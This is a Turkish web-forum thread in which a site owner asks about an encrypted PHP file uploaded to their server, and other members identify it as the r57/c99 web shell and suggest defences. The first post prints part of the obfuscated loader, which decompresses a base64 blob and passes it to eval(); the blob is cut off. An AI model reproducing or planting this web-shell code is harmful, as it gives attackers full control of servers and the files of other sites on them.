Şifrelenmiş PHP Virüsü?

Kodla Büyü
hasari

hasari

Hiperaktif Üye
Hiperaktif
Mesajlar
13,473
Merhaba arkadaşlar dosya yönetim bölümünden yüklenmiş bir .php dosyası sunucuda bir dosya yöneticisi görevi görüyor ve tüm siteye hakim olabiliyor. Bu virüs hakkında bilginiz var mı?

Benim Scriptme sağolsun arkadaşlar yüklemiş ve beni uyarmışlar. Tabi kendilerinde yönetici şifresi olmazsa yükleyemezlerdi şimdilik alınabilecek önlem php uzantılı dosya yüklenmesini kabul etmemek. Sizler bu virüsle karşılaştınız mı? İsteyene bu virüsü gönderebilirim fakat siteden tanıdığım güvendiğim kimse olması lazım zira kötü niyetli kişiler kullanmak isteyebilir.

Kodun bir kısmı şöyle:
Kod: 
<?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260);$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE335260[1])
<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$T4A747C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD9DDE2E=strlen($T059EC46CFE335260);$T43D5686285035C13=__FILE__;$T43D5686285035C13=file_get_contents($T43D5686285035C13);$T6BBC58A3B5B11DC4=0;preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"),$T43D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159DC7D007D3<$T0D47BDF6FD9DDE2E;){if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])
<<8);$T65CE9F6823D588A7+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87){$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;
for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26DD5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}else{$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}}else $T7C7E72B89B83E235[$T77605D5F26DD5248++]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A55--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5686285035C13=implode("",$T7C7E72B89B83E235);
$T43D5686285035C13="?".">".$T43D5686285035C13;return $T43D5686285035C13;}}}}eval(TC9A16C47DA8EEE87("QAIAPD9waHAgABEkY29sb3IgPSAAACIjZGY1
IjsgICRkZWZhdWwAgHRfYWN0aW9uAbAnRmlsZXNNEAhhbicB+XVzZV9hamF4AhB0cnVAQGUBuWNoYXJzZXQBoCdXaW5kbw
EAd3MtMTI1MQPxICBpZighZW0AAHB0eSgkX1NFUlZFUlsnSFQIAFRQX1UA4F9BR0VOVCddKSkgUBB7CfAkBlByQWdlbnRzBNBhcnJhAAB5KCJHb29nbGUiLCAiU2x1IEBycACRTV
NOQm90AKFpYV9hcmMECGhpdmVyAPFZYW5kZXgAoVJhbSwAYmw
BUCkKkAhBcHJlZ19tYXRjaAAAKCcvJyAuIGltcGxvZGUoJwo4fCcsIAeYKQHAJy9pAVELDwsMaGVhCABkZXIoDQ
IvMS4wIDQwNCBObwCEdCBGb3VuZCcHwmV4aXQIQX0gQEAgADAgIEBzZXNzFpBfc3RhcnRBACgCQUBpbm
lfFBAoJ2Vycm9yXwBobG9nJyxOVUxMAdsBcF8CEnMnLEAQMAG7bWF4X2V4ZWN1HDFfdGltcBhlAjUFcAECX2
xpbWl0KAODAVFtYWcABmljX3F1b3Rlc19ydW4DUQH0ZAhCZWZpbhGgV1NPXxsAU0lPThDwJxjCMi40DTMVAW
dldBTwBDhncGMoHHMJGABmdW4kwwQQc3RyaXBzbGFzaGUYA3MoJB0yHsNyZXR1cm4gaXMcEB6BmOUBxT8g
AlIF0HAoJwQcCGACdTogBa95EVFAfwkWYAkkX1BPU1QkQAQcKEABkQKBAnAAAAYg1AArEAWwdDKAdx3Ac3Vic
3RyKFBIUAFAX09TLDAsMw5APTPwd2luIikgCwggCSRvKrEnAPAu8WVsc2UBV25peIA8AVEgICRzYWZlX20m8Akw
HuIT8Cgn7QABZhVyB4AhApcFwCAe0l9yZXBvcnRpML5uZxnjBOBkaXNhLdBfFoUIIQVnAe4F4iQA+WhvbWVfY3dkC
CEH4ACgJ8IHYGlzIQCIBhGkWydjOOIgCUBjaGRpcgF6LHAk5uADgAQvEFI9IBBiHeIJBvkUAAxRbGFjZSgXbyJcXDnhLw
BQAjYY4QkFlALPIgLCB3ACcRtQqEALECAC0VsCsGxlbigAwSktMV0gIfaiCBA9oBOQBNMuAQILQCArASEOZVNFUy0RW
x79bWQ1DdBIQC4gSSRII0AP4EARTqEAsATQIEtx8AADPwM/AzMR0Chib29sKSRHTE9CQQ8uTFNbJzTwVhJN0FQiJ1
0JUAkJYhObJOBhHQBsaWFCEARgMGIoUVAiTGlzdCBEaQAHcmVjdG9yeSIgPT4gIhmwFDAmsCiAIkZXICAAQGV4Ll5R
aW4gY3VycrAGVDAgAkEC1SAvcyAvdyAvYgK3BAkqAXhjb25maWcqBD9yBwYENwLpBGRTaG8i0XcgZCF2ZSAEwG4K
wE5AcwPTbmV0TtAEIHQgLWFuAvlydW5uLXAgc2Vydhm1aWNlAtc9sGFyXfEOAVUB8AWgY1UgdAI48AgU0F8hAiEH
wmNvbXB1dGVyAjh2aWVAxncHAiJBUlAgVDMxCQNhcnAIwAGzSRGYUCBDD8J1cmFT0QIjaXAMUBEQIC9hHmBsbCI
GUCfRPdUaTyAgGlMXJmxzIC1sKiloYQYzbBwBZnVAIGF0UOBiCnBzIHagAYBhIExpbnV4EAAG0GQgZXh0ZW4IEmRlZC
ACsnN5c3RlbQjjbHMDkSAiHi12BRMgInMW4W9wZW4C4EHRD1cWhSAQoXwgZ0OQIC1pIAfxZReTInBybxaQSD5zFh
F0dQNkcHMgYXVzQQxgJNEHQwuyIEhwImCQZCAQQCBzdWkJowNkAZIvIC10AAB5cGUgZiAtcGVybSAtMDQwL7owM
A+wcwP5A7cn0CnvBKIuBK8ErwiTZwifIKfsCJ8yA/8gcwO2CJ81QAifDTIEr2QuMSHgLmk8fW5jMyIbIRGPEYJuYW0xIgL4
EckfoAGgKh9Cye8ELwQnXCIC.........
 
ilk aşamada base64_decode edince biraz daha okunur bir hale geliyor ama devamında bazı işlemler daha var. Onları sırasıyla takip edersek çözülür, ama üşendim yapmaya :)
 
Hocam sitenize yüklenmiş olan dosyayı gönderirseniz size daha detaylı bilgi verebilirim. Büyük ihtimal ile sitenize shell diye tabir edilen (en meşhurları r57,c99) php uzantılı dosyalar yüklenmiştir.
Bu dosyalar serverınız tam anlamıyla güvenlik almamış ise çok büyük yetkilere sahip olabilirler. Hatta serverdaki diğer sitelerin dosyalarına da sızma yapılıyor. Benim de bu tür bir olay başıma gelmişti.
 
ykoc' Alıntı:
Hocam sitenize yüklenmiş olan dosyayı gönderirseniz size daha detaylı bilgi verebilirim. Büyük ihtimal ile sitenize shell diye tabir edilen (en meşhurları r57,c99) php uzantılı dosyalar yüklenmiştir.
Bu dosyalar serverınız tam anlamıyla güvenlik almamış ise çok büyük yetkilere sahip olabilirler. Hatta serverdaki diğer sitelerin dosyalarına da sızma yapılıyor. Benim de bu tür bir olay başıma gelmişti.
Genişletmek için tıkla ...
Aynen hocam r57 adında bir dosya. Pmden size dosyaları gönderiyorum.
 
valla siteyi yap bir de bu salaklarla uğraş.
1 aydır uğraşıp duruyorum.
Sonunda hacker yapacaklar beni :)
 
Ya ben o işleri bıraktım :P 15 sene önceki şeyler. zaman aşımına uğramıştır. :D Aslında bu konuları bilek lazım ki önlem alalım. CEH bunun için var.
 
Hasari hocam size özel mesaj gönderdim. Sonrasında yararlı olabileceğim bir husus olursa elimden geldiğince yardım ederim.
 
r57.php ve c69.php PHP shell scriptlerinin en tehlikeli ikisi. Geçmiş olsun hasari hocam. Bu dosya ile sunucudaki tüm dosyalara ulaşılabiliyor. base64_decode ile tamamına ulaşılamayabilir, içerisinde binary code'lar da vardır büyük ihtimal.

Geçtiğimiz ay local bilgisayarıma bu ve sql injeksion ile saldırı oldu. Atlattım çok şükür. Antivirüs programları bu iki dosyayı yakalıyor aslında. Avira yakaladı beni uyardı, saldırgan sistemime girmeye çalışırken ben de kayıtları tutup, dava açmaya hazırlanmıştım ki, saldırganın vicdanı el vermemiş mesaj attı v.s.
 
Cevap yazmak için giriş yap yada kayıt ol.
BBNET
Geri
Üst